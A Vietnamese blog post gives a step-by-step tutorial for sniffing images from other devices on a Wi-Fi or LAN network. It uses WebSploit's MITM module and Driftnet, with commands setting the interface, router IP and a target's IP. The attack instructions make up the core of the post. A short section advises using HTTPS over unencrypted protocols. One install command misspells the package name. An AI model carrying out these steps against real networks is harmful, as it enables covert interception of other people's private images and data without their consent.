Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet

Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet



Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet

Việc tham gia vào một mạng Wifi hay mạng LAN Ethernet tức là mọi thông tin của bạn đều được truyền đi trên mạng . Việc các Attacker thực hiện một cuộc MITM có thể khiến thông tin của bạn bị Attacker nắm bắt, đặc biệt nó sẽ vô cùng nguy hiểm nếu thông tin của bạn được truyền đi bằng một giao thức kết nối không an toàn và chức các loại thông tin nhạy cảm của bạn . Đó có thể là bất cứ cái gì mà bạn trao đổi trên Internet như pass ngân hàng, facebook , ảnh nhạy cảm , ...

Và trong bài viết này , ta sẽ cùng đi tìm hiểu xem cách thực hiện cuộc đánh hơi thông tin trên mạng , và thông tin mà ta đánh hơi ở đây là hình ảnh được truyền trên mạng . Đầu tiên ta sẽ đi xem cách thực hiện và sau đó  ta sẽ đi tìm hiểu cách nào mà cuộc tấn công đã được thực hiện và những lưu ý .

Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet

A. Thực hiện tấn công 

Để thực hiện tấn công đánh hơi ảnh trên mạng, ta sẽ sử dụng công cụ WebSploit và Driftnet .

Chạy lệnh duy nhất sau trên Terminal :
sudo apt install webspoit && sudo apt install driftnet 
Sau khi đã chạy xong lệnh trên . Ta tiến hành đánh và chạy lần lượt các lênh sau :
1. sudo websploit
2. use network/mitm
3. set Interface <interface_mạng>
4. set Router <router_ip>
5. set Target <target_ip>
6. run 
Trong đó :

<interface_mạng>   : Là giao diện mạng mà ta sẽ sử dụng để đánh hơi , có thể là wlan0 đối với Wifi haocwj eth0 đối với Ethernet và còn tùy vào mỗi hệ điều hanh mà tên gọi sẽ khác nhau
<router_ip> : IP của router
<target_ip> : IP của thiết bị mà ta nhắm mục tiêu

Và thế là xong. Việc cuối cùng công cụ sẽ lo tất .

Ủa vậy thì " Cách sử dụng Driftnet đâu ? " . 😂 . Cái đó là WebSploit sẽ tự chạy cho ta , còn các bạn muốn dùng riêng Driftnet thì chỉ cần tạo một cuộc tấn công MITM sau đó khởi động công cụ lên bằng một lệnh duy nhất : " driftnet "

B. Cuộc tấn công diễn ra như thế nào ?

Tôi mô tả tóm tắt như sau :

Ta thực hiện một cuộc MITM chuyển hướng toàn bộ lưu lượng truy cập đến máy ta . Dùng Driftnet để đánh hơi và lọc ảnh được truyền đi từ thiết bị của nạn nhân trên mạng ra cho ta .


C. Vậy lưu ý là gì ?

Đây là cuộc tấn công gây nguy hiểm nếu như các thông tin nhạy cảm của bạn được truyền đi trong mạng bằng các giao thức kém an toàn sau ( Tức là thông tin được truyền đi mà chả mã hóa ) :

HTTP ; TELNET ; SNMP ; POP ; FTP ; NNTP ; IMAP

Do đó tốt nhất nên sử dụng https và các giao thức bảo mật được Google khuyến nghị . Nếu sử dụng các giao thức kém an toàn, tuyệt đối không sử dụng để truy cập vào các thông tin nhạy cảm của bạn .

Lưu ý đối với cuộc tấn công :

Cuộc tấn công này khá là đơn giản và nó nhắm mục tiêu là các giao thức không được mã hóa, do đó nếu ảnh được truyền đi dưới các giao thức được mã hóa như https , ... thì ta sẽ không đánh hơi được mạng, do đó, chỉ nên lấy cuộc tấn công này là tài liệu nghiên cứu thêm thôi .

Video tham khảo :


OK ! DONE 

[ "  Bạn nhắm mắt lại. Đó là điều khác biệt. Đôi lúc bạn không thể tin điều mắt thấy, bạn phải tin điều mình cảm nhận. Và nếu bạn muốn người khác tin tưởng mình, bạn phải cảm thấy mình cũng có thể tin tưởng họ, thậm chí ngay cả khi bạn ở trong bóng tối. Ngay cả khi bạn đang rơi. " ]
Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet Sử dụng Driftnet để đánh hơi mạng . Cách xem các hình ảnh được truyền trong mạng bằng công cụ Driftnet Reviewed by Kane Pham on 9:00 PM Rating: 5

No comments:

Powered by Blogger.